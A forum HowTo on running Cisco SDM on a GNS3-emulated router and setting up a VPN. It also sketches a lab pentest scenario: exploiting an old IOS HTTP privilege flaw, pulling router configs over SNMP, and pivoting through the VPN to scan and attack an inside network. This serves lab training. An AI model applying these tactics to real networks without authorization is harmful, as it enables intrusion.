If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

This HowTo will detail installing cisco SDM into an emulated router in BT4. SDM is a slick GUI that can simplify some configuration tasks, and can be cool to mess around with. Some feature may or may not work depending on what IOS version and feature set it is coupled with. I Apologize for any redundancy with previous posts, but I like my HowTo's to be as complete as possible, despite this being somewhat of a GNS3 series.

Later on in the post I'll add a simple VPN setup, and demonstrate pivoting with it. I'd like to address command like setup of IPS if I can. I've begun some of the stages, so I'll keep you posted. It was initially intended to tie in with SDM, but I have as yet been unable to get SDM to recognise that my emulated IOS does indeed have IPS included in the feature set.

The primary file needed in this case is

Code:

CisSdM.rar

You'll need to extract it. I like to keep things clean in a working directory.

Now add your IOS image into GNS3. Start your router and console in. Wait until it is finished booting and is idle. Right click and calculate and IDLE-PC value, otherwise your CPU will be loaded hard. Choose a value with a * next to it. Configure your router for SSH, and some other basics. Use 1024 bits for the SSH key when prompted. SDM also requires the user to have level 15 privilege

And now just browse to the router's IP in your browser. Make sure you have Java installed. Some different java version allow some SDM features to work properly. I'm not sure which however. Also turn off your pop-up blocker. I am using
a windows VM just to simply the process as everything was already set up.

Code:

https://192.168.25.105/

Have fun with SDM!

......

And now on to the simple VPN server config. Could be handy for messing around with VPN discovery or bruteforcing tools. I haven't had the time to try some of my ideas as of yet, or other VPN configurations for that matter. The original idea for this came as an idea for a nice way to pivot inside. Suppose you've already comprimised your client's cisco router. Maybe it hasn't seen care lately, has an old IOS version that has the level/99 HTTP vulnerability. Well now you've got
level 15 access. Now what? Ok, well maybe show arp, and hey, how many records is that in the table? Around 34 entries. Let's ping the IPs! Well some are alive, but if only I could nmap them somehow or use metasploit.......

Router's IP in this scenario is 192.168.25.105, which is sort of representing the public or outside in the config below.

The 192.168.10.0 network is the inside network we are wanting to pivot to in order to attack in this given scenario.

Let me know if this if useful or interesting for any of you. I'm still working on the SIP/VoIP tools for my previous write-up and working on this howto as well. IPS stuff will be coming, but I'd like to get some video's of the previous processes up first to help illustrate that, then comes IPS. Stay tuned....

I have now made a short video of a scenario using some of the above configurations.

You've been contracted to perform a pentest, and been provided the public IP of the company(per the scope of this particular test). Social engineering attacks are not authorized by the client, and the goal is to penetrate from outside to the inside and be able to attack inside machines.

The public network in this is represented by my labratory LAN network 192.168.25.0/24 which is bridged to tap0, and connected to the outside interface of the client's router(fa0/0).
The private network is on router interface fa0/1 and is bridged to tap1. I also have a Damn Small Linux virtual machine bridged to tap1 so we have a small target. The client's inside LAN is discovered to be 10.0.0.0/24. The video demonstrates nmap to discover services, snmp to steal the config, and VPN to pivot to the inside network for scanning and attacks.